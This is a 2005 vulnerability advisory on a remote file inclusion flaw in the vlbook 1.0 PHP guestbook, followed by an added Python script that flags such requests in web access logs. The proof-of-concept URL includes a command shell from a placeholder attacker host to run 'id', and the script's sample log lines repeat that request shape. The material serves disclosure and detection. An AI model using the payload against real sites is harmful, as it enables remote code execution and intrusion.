------------------------------------------------------
Nightmare TeAmZ Advisory 005
------------------------------------------------------
Date - 10/2005

vlbook Remote File Inclusion

AFFECTED PRODUCTS
=================
vlbook 1.0 Guestbook
http://vlbook.com/

OVERVIEW
========
The vlbook is a free, open source and light-weight guestbook written in PHP
using flat files to store messages and settings. It comes with an install
script for quick and effortless installation.

DETAILS
=======
1. Remote File Inclusion

POC
===
1. ------ Remote File Inclusion Example --------

1. Remote File Inclusion

Vulnerable Path: /index.php?user=

Example:
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=http://www.[Evil-Site].org/cmd.php?&cmd=id

Credits
=======
This vulnerability was discovered and researched by BiPi_HaCk,
Advisory by Sub_Z3r0 of Nightmare TeAmZ,
Site: http://www.NightmareTeAmZ.altervista.org
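
Added example, not part of the original advisory and not vlbook code: a log check that flags requests to index.php in which any query parameter carries a scheme://... value, the request shape shown in the POC. It assumes Apache common-log-format lines; the sample lines, hosts and the function names remote_params and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that begins with a URL scheme (http://, ftp://, php://, ...).
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

def remote_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines, script="index.php"):
    """Return [(line_no, path, param, value)] for suspicious requests to script."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we can parse
        target = m.group(1)
        path = urlsplit(target).path
        if not path.endswith("/" + script):
            continue
        for name, value in remote_params(target):
            findings.append((no, path, name, value))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2005:10:01:02 +0000] "GET /guestbook/index.php?user=english&l=1&t=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2005:10:03:44 +0000] "GET /guestbook/index.php?user=english&l=1&t=1&a=http://remote.example/cmd.php?&cmd=id HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/Oct/2005:10:04:10 +0000] "GET /guestbook/index.php?user=english&a=hTTp%253A%252F%252Fremote.example%252Fx.txt HTTP/1.1" 200 790',
    '203.0.113.5 - - [12/Oct/2005:10:05:00 +0000] "GET /guestbook/index.php?user=english&a=sign HTTP/1.1" 200 4300',
]

if __name__ == "__main__":
    for no, path, name, value in scan(SAMPLE_LOG):
        print(f"line {no}: {path} parameter {name!r} carries remote URL {value!r}")
```

A hit only shows that such a request was received; whether the file was actually fetched and included has to be confirmed from the application host (outbound connections, PHP error log).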